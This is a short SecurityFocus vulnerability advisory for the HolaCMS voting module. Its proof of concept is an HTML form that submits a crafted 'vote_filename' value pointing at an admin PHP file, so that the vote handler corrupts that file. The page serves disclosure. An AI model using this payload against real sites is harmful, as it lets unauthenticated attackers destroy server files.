Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

HolaCMS Voting Module Remote File Corruption Vulnerability

The following example was provided using a form to submit a custom HTTP POST to the site:

<form action="http://www.example.com/[site-with-vote].php?vote=1" method="POST">
<input type="hidden" name="vote_filename" value="admin/multiuser/multiuser.php">
<input type="hidden" name="result" value="0">
<input type="submit" value="Stimme abgeben" name="button">
</form>







 

Privacy Statement
Copyright 2008, SecurityFocus